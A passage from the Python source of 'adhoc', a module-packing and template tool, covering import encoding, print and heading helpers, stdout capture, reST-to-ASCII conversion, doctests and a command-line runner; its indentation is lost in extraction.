dbg_comm, m, import_def.rstrip()))
result.append(import_def)
continue
import_args = self.line_tag_strip(import_def, self.import_flag_symbol)
module = ''
mo = re.match(
'(\\s*)from\\s+([a-zA-Z_][.0-9a-zA-Z_]*)\\s+'
'import', import_def)
if mo:
indent = mo.group(1)
module = mo.group(2)
else:
mo = re.match(
'([ \t\r]*)import[ \t\r]+([a-zA-Z_][.0-9a-zA-Z_]*)',
import_def)
if mo:
indent = mo.group(1)
module = mo.group(2)
if len(module) > 0:
module_flat = ((('flat' in import_args.lower().split()) and (True)) or (None))
module_flat = ((('full' in import_args.lower().split()) and (False)) or (module_flat))
module_forced = ((('force' in import_args.lower().split()) and (True)) or (forced))
source = self.encode_module_(module, for_, indent, zipped, module_flat, module_forced)
import_def = sformat('{0}{1}',source, import_def)
else:
if self.verbose:
list(map(sys.stderr.write,
('# ', m, 'warning: no import found! `',
import_def.rstrip(), '`\n')))
result.append(import_def)
string = ''.join(result)
# These are last, to avoid enabling/disabling the wrong imports etc.
# check for @: adhoc_enable :@
string = self.enable_sections(string, 'adhoc_enable')
# check for @: adhoc_disable :@
string = self.disable_sections(string, 'adhoc_disable')
#adhoc_dump_list(result)
return string
# --------------------------------------------------
# ||:sec:|| User API
# --------------------------------------------------
def encode_include( # |:mth:|
self, file_, as_=None, indent='', zipped=True):
m = 'if: '
def encode_module( # |:mth:|
self, module, for_=None, indent='', zipped=True, flat=None, forced=None):
if hasattr(module, __name__):
name = module.__name__
else:
name = module
if self.verbose:
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
sys.stderr.write(sformat(
'{0}Get module `{1}`\n',
dbg_comm, name))
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
return self.encode_module_(module, for_, indent, zipped, flat, forced)
def compile(self, string, name=None, for_=None, # |:mth:|
zipped=True, forced=None):
'''Compile a string into adhoc output.'''
if self.verbose:
if name is None:
name = repr(string[:50])
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
sys.stderr.write(sformat(
'{0}Compiling string `{1}`\n',
dbg_comm, name))
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
return self.compile_(string, name, for_, zipped, forced)
# @:adhoc_run_time_section:@ on
def compileFile(self, file_name, for_=None, zipped=True, forced=None): # |:mth:|
# @:adhoc_run_time_section:@ off
"""Compile a file into adhoc output.
Since a module that has RtAdHoc defined is already adhoc'ed,
the run-time RtAdHoc method returns the file source as is.
"""
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_section:@ off
if self.verbose:
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
sys.stderr.write(
sformat('{0}Compiling {1}\n',dbg_comm, file_name))
sys.stderr.write(sformat(
'{0}--------------------------------------------------\n',
dbg_comm))
# @:adhoc_run_time_section:@ on
file_name, source = self.std_source_param(file_name, None)
# @:adhoc_run_time_section:@ off
source = self.compile_(source, file_name, for_, zipped, forced)
# @:adhoc_run_time_section:@ on
return source
# @:adhoc_run_time_section:@ END
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.class" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.f.hl" t) (insert "\n"))
hlr = None
def hlcr(title=None, tag='|||' ':CHP:|||', rule_width=50, **kwargs): # ||:fnc:||
comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dstr = []
dstr.append(''.join((comm, '-' * rule_width)))
if title:
dstr.append(sformat('{0}{2:^{1}} {3!s}',
comm, ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
tag, title))
dstr.append(''.join((comm, '-' * rule_width)))
return '\n'.join(dstr)
def hlsr(title=None, tag='||' ':SEC:||', rule_width=35, **kwargs): # |:fnc:|
return hlcr(title, tag, rule_width)
def hlssr(title=None, tag='|' ':INF:|', rule_width=20, **kwargs): # |:fnc:|
return hlcr(title, tag, rule_width)
def hlc(*args, **kwargs): # |:fnc:|
for line in hlcr(*args, **kwargs).splitlines():
printf(line, **kwargs)
def hls(*args, **kwargs): # |:fnc:|
for line in hlsr(*args, **kwargs).splitlines():
printf(line, **kwargs)
def hlss(*args, **kwargs): # |:fnc:|
for line in hlssr(*args, **kwargs).splitlines():
printf(line, **kwargs)
def hl(*args, **kwargs): # |:fnc:|
for line in hlr(*args, **kwargs).splitlines():
printf(line, **kwargs)
def hl_lvl(level=0): # |:fnc:|
global hlr
if level == 0:
hlr = hlssr
elif level == 1:
hlr = hlsr
else:
hlr = hlcr
hl_lvl(0)
# (progn (forward-line 1) (snip-insert-mode "py.f.single.quote" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.remove.match" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printenv" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.uname-s" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printe" t) (insert "\n"))
def printe(*args, **kwargs): # ||:fnc:||
kwargs['file'] = kwargs.get('file', sys.stderr)
printf(*args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.squeeze" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.indent" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.func" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| UTILTIES
# --------------------------------------------------
def adhoc_dump_list(list_, max_wid=None): # ||:fnc:||
if max_wid is None:
max_wid = 78
for indx, elt in enumerate(list_):
elt = str(elt)
if len(elt) > max_wid:
elt = elt[:max_wid-3] + ' ...'
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', sformat('elt[{0}]', indx), repr(elt)))
def adhoc_dump_sections(sections, max_wid=None): # ||:fnc:||
if max_wid is None:
max_wid = 78
for indx, section in enumerate(sections):
cut_section = list(section)
if len(cut_section[1]) > max_wid:
cut_section[1] = cut_section[1][:max_wid-3] + ' ...'
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', sformat('section[{0}]', indx), strclean(cut_section)))
# @:adhoc_uncomment:@
# @:adhoc_template:@ -catch-stdout
def catch_stdout(): # ||:fnc:||
"""Install a string IO as `sys.stdout`.
:returns: a state variable that is needed by
:func:`restore_stdout` to retrieve the output as string.
"""
output_sio = _AdHocStringIO()
sv_stdout = sys.stdout
sys.stdout = output_sio
return (sv_stdout, output_sio)
def restore_stdout(state): # ||:fnc:||
"""Restore capturing `sys.stdout` and get captured output.
:returns: captured output as string.
:param state: state variable obtained from :func:`catch_stdout`.
"""
sys.stdout, output_sio = state
output = output_sio.getvalue()
output_sio.close()
return output
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ -max-width-class
class mw_(object):
mw = 0
def __call__(self, col):
if self.mw < len(col):
self.mw = len(col)
return col
class mwg_(object):
def __init__(self, mwo):
self.mwo = mwo
def __call__(self):
return self.mwo.mw
# mws = [mw_(), mw_()]
# mwg = [mwg_(mwo) for mwo in mws]
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ -rst-to-ascii
RST_HEADER = '''\
.. -*- mode: rst; coding: utf-8 -*-
.. role:: mod(strong)
.. role:: func(strong)
.. role:: class(strong)
.. role:: attr(strong)
.. role:: meth(strong)
'''
RST_FOOTER = '''
.. :ide: COMPILE: render reST as HTML
.. . (let* ((fp (buffer-file-name)) (fn (file-name-nondirectory fp))) (save-match-data (if (string-match-t "[.][^.]*$" fn) (setq fn (replace-match "" nil t fn)))) (let ((args (concat " " fp " | ws_rst2html.py --traceback --cloak-email-addresses | tee " fn ".html "))) (save-buffer) (compile (concat "PATH=\\".:$PATH\\"; cat " args))))
..
.. Local Variables:
.. mode: rst
.. snip-mode: rst
.. truncate-lines: t
.. symbol-tag-symbol-regexp: "[-0-9A-Za-z_#]\\\\([-0-9A-Za-z_. ]*[-0-9A-Za-z_]\\\\|\\\\)"
.. symbol-tag-auto-comment-mode: nil
.. symbol-tag-srx-is-safe-with-nil-delimiters: nil
.. End:
'''
def rst_to_ascii(string, header_footer=False): # ||:fnc:||
'''Convert ReST documentation to ASCII.'''
string = re.sub(
'^\\s*[.][.]\\s*(note|warning|attention)::(?im)', '\\1:', string)
string = re.sub(
'^\\s*[.][.]\\s*automodule::[^\\n]*\\n(\\s[^\\n]+\\n)*\\n(?m)',
'', string + '\n\n')
string = re.sub('^\\s*[.][.]([^.][^\\n]*|)\\n(?m)', '', string)
string = re.sub('\\\\\\*', '*', string)
string = re.sub('^(\\s*)\\|(\\s|$)(?m)', '\\1', string)
if header_footer:
string = ''.join((RST_HEADER, string, RST_FOOTER))
string = re.sub('\\n\\n\\n+', '\\n\\n', string)
return string
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| SYMBOL-TAG TOOLS
# --------------------------------------------------
def compile_(files=None): # ||:fnc:||
'''Compile files or standard input.'''
if files is None:
files = []
if len(files) == 0:
files.append('-')
compiled_files = []
for file_ in files:
sys_path = sys.path
file_dir = os.path.abspath(os.path.dirname(file_))
sys.path.insert(0, file_dir)
ah = AdHoc()
compiled = ah.compileFile(file_)
compiled_files.append(compiled)
sys.path = sys_path
return ''.join(map(lambda c:
(((c.endswith('\n')) and (c)) or (''.join((c, '\n')))),
compiled_files))
# --------------------------------------------------
# |||:sec:||| TEST
# --------------------------------------------------
doc_index_rst_tag_symbols = ('adhoc_index_only',)
def tpl_hook_doc_index_rst(cls, section, tag, tag_arg): # ||:fnc:||
tag_sym_rx = '|'.join([re.escape(tag_sym) for tag_sym in doc_index_rst_tag_symbols])
return cls.section_tag_remove(section, tag_sym_rx, is_re=True)
def tpl_hook_readme(cls, section, tag, tag_arg): # ||:fnc:||
section = section.replace('@@contents@@', 'contents::')
tag_sym_rx = '|'.join([re.escape(tag_sym) for tag_sym in doc_index_rst_tag_symbols])
return cls.remove_sections(section, tag_sym_rx, is_re=True)
def adhoc_rst_to_ascii(string): # ||:fnc:||
'''Transform ReST documentation to ASCII.'''
string = rst_to_ascii(string)
string = string.replace('|@:|\\\\? ', '@:')
string = string.replace('\\\\? |:@|', ':@')
string = string.replace('|@:|', '`@:`')
string = string.replace('|:@|', '`:@`')
string = re.sub('^:[|]_?(adhoc[^|]*)_?[|]([^:]*):(?m)', '@:\\1:@\\2', string)
string = re.sub('[|]_?(adhoc[^|]*)_?[|]', '@:\\1:@', string)
return string
def inc_template_marker(cls, as_template=False): # ||:fnc:||
sv = AdHoc.inc_delimiters()
template_tag = ''.join((
'# ', AdHoc.section_tag('adhoc_template_v'),
' ', as_template, '\n'))
AdHoc.reset_delimiters(sv)
return template_tag
def get_readme(file_=None, source=None, as_template=False, transform=True): # ||:fnc:||
file_, source = AdHoc.std_source_param(file_, source)
template_name = 'doc/index.rst'
tpl_hooks = AdHoc.template_process_hooks
AdHoc.template_process_hooks = {template_name: tpl_hook_readme}
template = AdHoc.get_named_template(template_name, file_, source)
AdHoc.template_process_hooks = tpl_hooks
template = template + '\n\n' + __doc__ + '\n'
template = AdHoc.remove_sections(template, 'adhoc_index_only')
if transform:
template = adhoc_rst_to_ascii(template).strip() + '\n'
if as_template:
template_tag = inc_template_marker(AdHoc, as_template)
output = []
output.append(template_tag)
output.append(RST_HEADER)
output.append(template)
output.append(RST_FOOTER)
output.append(template_tag)
template = ''.join(output)
return template
import use_case_000_ as use_case # @:adhoc:@
def get_use_cases(as_template=None): # ||:fnc:||
output = []
if as_template is not None:
template_tag = inc_template_marker(AdHoc, as_template)
else:
template_tag = ''
output.append(template_tag)
import use_case_000_ as use_case
state = catch_stdout()
use_case.main('script --docu'.split())
output.append(restore_stdout(state))
import use_case_001_templates_ as use_case # @:adhoc:@
state = catch_stdout()
use_case.main('script --docu'.split())
output.append(restore_stdout(state))
import use_case_002_include_ as use_case # @:adhoc:@
state = catch_stdout()
use_case.main('script --docu'.split())
output.append(restore_stdout(state))
import use_case_003_import_ as use_case # @:adhoc:@
state = catch_stdout()
use_case.main('script --docu'.split())
output.append(restore_stdout(state))
import use_case_005_nested_ as use_case # @:adhoc:@
state = catch_stdout()
use_case.main('script --docu'.split())
output.append(restore_stdout(state))
output.append(template_tag)
output = ''.join(output)
return output
# --------------------------------------------------
# |||:sec:||| TEST
# --------------------------------------------------
def adhoc_run_time_module(): # ||:fnc:|| |:todo:| experimental
import imp
if 'adhoc.rt' in sys.modules:
return
file_ = __file__
source = None
exec_ = False
if file_.endswith('.pyc'):
file_ = file_[:-1]
if 'adhoc' in sys.modules:
adhoc = sys.modules['adhoc']
else:
adhoc = imp.new_module('adhoc')
setattr(adhoc, '__file__', file_)
sys.modules['adhoc'] = adhoc
exec_ = True
if not hasattr(adhoc, '__adhoc__'):
__adhoc__ = {}
adhoc.__adhoc__ = __adhoc__
if 'source' not in adhoc.__adhoc__:
adhoc.__adhoc__['source'] = AdHoc.read_source(file_)
if exec_:
source = AdHoc.encode_source(adhoc.__adhoc__['source'])
exec(source, adhoc)
RT = imp.new_module('adhoc.rt')
setattr(adhoc, 'rt', RT)
import adhoc_test.sub # @:adhoc:@ force
def adhoc_check_modules(): # ||:fnc:||
hl_lvl(0)
hlc('adhoc_check_modules')
printf(sformat('{0}--------------------------------------------------',
dbg_comm))
msg = ((('adhoc_test' in sys.modules) and ('SEEN')) or ('NOT SEEN'))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'PRE sub import', 'adhoc_test ' + msg))
msg = ((('adhoc_test' in sys.modules) and ('SEEN')) or ('NOT SEEN'))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'POST sub import', 'adhoc_test ' + msg))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'dir(adhoc_test.sub)', dir(adhoc_test.sub)))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'adhoc_test.sub.__file__', adhoc_test.sub.__file__))
if 'adhoc_test' in sys.modules:
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'dir(adhoc_test)[auto]', dir(adhoc_test)))
printf(sformat('{0}--------------------------------------------------',
dbg_comm))
import adhoc_test # @:adhoc:@
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'dir(adhoc_test)', dir(adhoc_test)))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'adhoc_test.__file__', adhoc_test.__file__))
if hasattr(adhoc_test, '__path__'):
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'adhoc_test.__path__', adhoc_test.__path__))
def adhoc_check_module_setup(): # ||:fnc:||
'''
>>> state = catch_stdout()
>>> adhoc_check_module_setup()
>>> contents = restore_stdout(state)
>>> contents = re.sub('(mtime.*\\])[^[]*(\\[)', r'\\1\\2', contents)
>>> contents = re.sub(' at 0x([0-9a-f]+)', '', contents)
>>> contents = re.sub(r'adhoc\\.pyc', 'adhoc.py', contents)
>>> contents = '\\n'.join([l.strip() for l in contents.splitlines()])
.. >>> ign = open('adhoc_check_module_setup.t', 'w').write(
.. ... re.sub('^(?m)', ' ', contents)
.. ... .replace('\\\\', '\\\\\\\\') + '\\n')
.. @:adhoc_expected:@ adhoc_check_module_setup.e
>>> printf(contents, end='') #doctest: +ELLIPSIS
# --------------------------------------------------
# |||:CHP:||| adhoc_check_module_setup
# --------------------------------------------------
# -----------------------------------
# ||:SEC:|| no:module:found
# -----------------------------------
# :DBG: module : ]['__adhoc__', '__doc__', '__name__'...][
# ------------------------------
# :DBG: __adhoc__ : ]...
# :DBG: __doc__ : ]None[
...
# --------------------
# |:INF:| no:module:found.__adhoc__
# --------------------
# :DBG: __adhoc__ : ]...
# ------------------------------
# :DBG: __module__ : ]<module 'no:module:found' (built-in)>[
# :DBG: mode : ]...[
# :DBG: mtime : ][
# -----------------------------------
# ||:SEC:|| adhoc_test.sub
# -----------------------------------
# :DBG: module : ]['ADHOC_TEST_SUB_IMPORTED',...
# ------------------------------
# :DBG: ADHOC_TEST_SUB_IMPORTED: ]True[
# :DBG: __adhoc__ : ]...
...
# :DBG: __doc__ : ]None[
# :DBG: __file__ : ]...adhoc_test/sub/__init__.py...[
...
# --------------------
# |:INF:| adhoc_test.sub.__adhoc__
# --------------------
# :DBG: __adhoc__ : ]...
# ------------------------------
# :DBG: __module__ : ]<module 'adhoc_test.sub' from...
...
# :DBG: source : ]...# -*- coding: utf-8 -*-\\n\\nADHOC_TEST_SUB_IMPORTED = True\\n...[
# -----------------------------------
# ||:SEC:|| adhoc
# -----------------------------------
# :DBG: adhoc : ]...
# ------------------------------
# :DBG: AH_CHECK_SOURCE : ]...
...
# :DBG: AdHoc : ]<class 'adhoc.AdHoc'>[
# :DBG: AdHocError : ]...adhoc.AdHocError...[
...
# :DBG: RST_HEADER : ]...
...
# :DBG: __adhoc__ : ]...
...
# :DBG: __file__ : ].../adhoc.py...[
# :DBG: __name__ : ]adhoc[
...
# :DBG: _nativestr : ]<function _nativestr>[
# :DBG: _quiet : ]False[
# :DBG: _uc : ]<function ...>[
# :DBG: _utf8str : ]<function _utf8str>[
# :DBG: _verbose : ]False[
# :DBG: adhoc_check_encode_module: ]<function adhoc_check_encode_module>[
# :DBG: adhoc_check_module_setup : ]<function adhoc_check_module_setup>[
# :DBG: adhoc_check_modules : ]<function adhoc_check_modules>[
# :DBG: adhoc_check_packing : ]<function adhoc_check_packing>[
# :DBG: adhoc_dump_list : ]<function adhoc_dump_list>[
# :DBG: adhoc_dump_sections : ]<function adhoc_dump_sections>[
# :DBG: adhoc_rst_to_ascii : ]<function adhoc_rst_to_ascii>[
# :DBG: adhoc_run_time_module : ]<function adhoc_run_time_module>[
# :DBG: adhoc_test : ]<module 'adhoc_test' from '...adhoc_test/__init__.py...'>[
# :DBG: base64 : ]<module 'base64' from '.../base64.py...'>[
# :DBG: catch_stdout : ]<function catch_stdout>[
# :DBG: compile_ : ]<function compile_>[
# :DBG: dbg_comm : ]# [
# :DBG: dbg_fwid : ]23[
# :DBG: dbg_twid : ]9[
# :DBG: dict_dump : ]<function dict_dump>[
# :DBG: ditems : ]<function <lambda>>[
# :DBG: dkeys : ]<function <lambda>>[
# :DBG: doc_index_rst_tag_symbols: ]('adhoc_index_only',)[
# :DBG: dump_attr : ]<function dump_attr>[
# :DBG: dvalues : ]<function <lambda>>[
# :DBG: file_encoding_is_clean : ]True[
# :DBG: get_readme : ]<function get_readme>[
# :DBG: get_use_cases : ]<function get_use_cases>[
# :DBG: hl : ]<function hl>[
# :DBG: hl_lvl : ]<function hl_lvl>[
# :DBG: hlc : ]<function hlc>[
# :DBG: hlcr : ]<function hlcr>[
# :DBG: hlr : ]<function hlssr>[
# :DBG: hls : ]<function hls>[
# :DBG: hlsr : ]<function hlsr>[
# :DBG: hlss : ]<function hlss>[
# :DBG: hlssr : ]<function hlssr>[
# :DBG: inc_template_marker : ]<function inc_template_marker>[
# :DBG: isstring : ]<function isstring>[
# :DBG: main : ]<function main>[
# :DBG: mw_ : ]<class 'adhoc.mw_'>[
# :DBG: mwg_ : ]<class 'adhoc.mwg_'>[
# :DBG: namespace_dict : ]<module 'namespace_dict' from '...namespace_dict.py...'>[
# :DBG: nativestr : ]<function nativestr>[
# :DBG: os : ]<module 'os' from '.../os.py...'>[
# :DBG: printe : ]<function printe>[
# :DBG: printf : ]<...function print...>[
# :DBG: re : ]<module 're' from '.../re.py...'>[
# :DBG: restore_stdout : ]<function restore_stdout>[
# :DBG: rst_to_ascii : ]<function rst_to_ascii>[
# :DBG: run : ]<function run>[
# :DBG: setdefaultencoding : ]<function setdefaultencoding>[
# :DBG: sformat : ]<function sformat>[
...
# :DBG: sys : ]<module 'sys' (built-in)>[
# :DBG: tpl_hook_doc_index_rst : ]<function tpl_hook_doc_index_rst>[
# :DBG: tpl_hook_readme : ]<function tpl_hook_readme>[
# :DBG: uc : ]<function uc>[
# :DBG: uc_type : ]<...>[
# :DBG: urllib : ]<module 'urllib' from '.../urllib...'>[
# :DBG: utf8str : ]<function utf8str>[
# --------------------
# |:INF:| adhoc.__adhoc__
# --------------------
# :DBG: __adhoc__ : ]...
# ------------------------------
# :DBG: __module__ : ]<module 'adhoc' from '.../adhoc.py...'>[
# :DBG: mode : ]...[
# :DBG: mtime : ][
# :DBG: source : ]#!...python...\\n# -*- coding: utf-8 -*-\\n# Copyright (C)...
...
.. @:adhoc_expected:@ adhoc_check_module_setup.e
.. \\|:here:|
'''
# :ide-menu: Emacs IDE Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' ()(eIDE-menu "z")
# also remove __builtins__, _AdHocStringIO ...
# (progn
# (goto-char point-min) (replace-string "/home/ws/project/ws-util/adhoc" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string "/home/ws/project/ws-util/lib/python" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string "/home/ws/project/ws-util" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string ".pyc" ".py" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string ".py" ".py..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string ".../urllib.py..." ".../urllib..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string "/usr/lib/python2.7" "..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string-regexp "# :DBG: __adhoc__\\( *\\): \\].*" "# :DBG: __adhoc__\\1: ]..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string-regexp "# :DBG: adhoc\\( *\\): \\].*" "# :DBG: adhoc\\1: ]..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string-regexp "# :DBG: module : ..'ADHOC_TEST_SUB_IMPORTED',.*" "# :DBG: module : ]['ADHOC_TEST_SUB_IMPORTED',..." nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string "<function _uc>" "<function ...>" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min) (replace-string "<type 'unicode'>" "<...>" nil (if (and transient-mark-mode mark-active) (region-beginning)) (if (and transient-mark-mode mark-active) (region-end)))
# (goto-char point-min)
# (goto-char point-min)
# (goto-char point-min)
# )
wid = 100
trunc = 10
hl_lvl(0)
hlc('adhoc_check_module_setup')
mod_name = 'no:module:found'
hls(mod_name)
module = AdHoc.module_setup('no:module:found')
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'module', str(dir(module))[:wid]))
dump_attr(module, wid=wid, trunc=trunc)
hl(sformat('{0}.__adhoc__',mod_name))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'__adhoc__', str(dir(module.__adhoc__))[:wid]))
dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
hls('adhoc_test.sub')
import adhoc_test.sub # @:adhoc:@
module = AdHoc.module_setup('adhoc_test.sub')
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'module', str(dir(module))[:wid]))
dump_attr(module, wid=wid, trunc=trunc)
hl('adhoc_test.sub.__adhoc__')
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'__adhoc__', str(dir(module.__adhoc__))[:wid]))
dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
try:
import adhoc
hls('adhoc')
module = AdHoc.module_setup('adhoc')
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'adhoc', str(dir(module))[:wid]))
dump_attr(module, wid=wid, trunc=trunc)
hl('adhoc.__adhoc__')
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'__adhoc__', str(dir(module.__adhoc__))[:wid]))
dump_attr(module.__adhoc__, wid=wid, trunc=trunc)
except ImportError:
pass
def adhoc_check_encode_module(): # ||:fnc:||
wid = 100
trunc = 10
hl_lvl(0)
hlc('adhoc_check_encode_module')
module = AdHoc.module_setup('no:module:found')
hl('IMPORT SPEC')
ahc = AdHoc()
import_spec = '\n'.join(ahc.run_time_section.splitlines()[:5])
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'ahc.run_time_section', import_spec))
for_=None
module_name = 'no:module:found'
#hl(sformat('GET MODULE {0}',module_name))
module_import = ahc.encode_module(module_name, for_)
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'module_import',
'\n'.join(module_import.splitlines()[:5])))
module_name = 'ws_sql_tools'
#hl(sformat('GET MODULE {0}',module_name))
module_import = ahc.encode_module(module_name, for_)
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'module_import',
'\n'.join(module_import.splitlines()[:5])))
hl('EXECUTE')
exec(module_import)
def adhoc_check_packing(): # ||:fnc:||
"""
>>> source = AdHoc.read_source(__file__)
>>> AdHoc.write_source('write-check', source)
>>> rsource = AdHoc.read_source('write-check')
>>> os.unlink('write-check')
>>> (source == rsource)
True
>>> psource = AdHoc.pack_file(source, zipped=False)
>>> usource = AdHoc.unpack_file(psource, zipped=False)
>>> (source == usource)
True
>>> psource = AdHoc.pack_file(source, zipped=True)
>>> usource = AdHoc.unpack_file(psource, zipped=True)
>>> (source == usource)
True
"""
def run(parameters, pass_opts): # ||:fnc:||
"""Application runner, when called as __main__."""
# (progn (forward-line 1) (snip-insert-mode "py.bf.sql.ws" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.bf.file.arg.loop" t) (insert "\n"))
# @: adhoc_enable:@
if not (parameters.compile or parameters.decompile):
parameters.compile = True
# @: adhoc_enable:@
if not parameters.args:
parameters.args = '-'
if _debug:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'parameters.args', parameters.args))
# |:here:|
if parameters.compile:
output = parameters.output
if _verbose:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:', 'output', output))
if output is None:
output = '-'
compiled = compile_(parameters.args)
if _debug:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'compiled', compiled))
AdHoc.write_source(output, compiled)
return
if parameters.decompile:
AdHoc.default_engine = True
export_dir = parameters.output
if export_dir is not None:
AdHoc.export_dir = export_dir
if _verbose:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:', 'export_dir', export_dir))
for file_ in parameters.args:
AdHoc.export(file_)
return
# |:here:|
# @:adhoc_disable:@ -development_tests
myfile = __file__
if myfile.endswith('.pyc'):
myfile = myfile[:-1]
myself = AdHoc.read_source(myfile)
if False:
adhoc_check_modules() # |:debug:|
adhoc_check_module_setup() # |:debug:|
# import ws_sql_tools
# ws_sql_tools.dbg_fwid = dbg_fwid
ws_sql_tools.check_file()
import_cmd_sections = AdHoc.tag_lines(
myself, AdHoc.line_tag('adhoc'))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'import_cmd_sections', import_cmd_sections))
import_cmd_sections = AdHoc.tag_split(
myself, AdHoc.line_tag('adhoc'))
adhoc_dump_sections(import_cmd_sections)
pass
# |:here:|
# @:adhoc_disable:@
# @:adhoc_disable:@ -more_development_tests
# @:adhoc_remove:@
ah_retained, ah_removed = AdHoc.tag_partition(
myself, AdHoc.section_tag('adhoc_remove'))
hl('REMOVED')
adhoc_dump_list(ah_removed)
hl('RETAINED')
adhoc_dump_list(ah_retained)
# @:adhoc_remove:@
# |:debug:| def/class
ah = AdHoc()
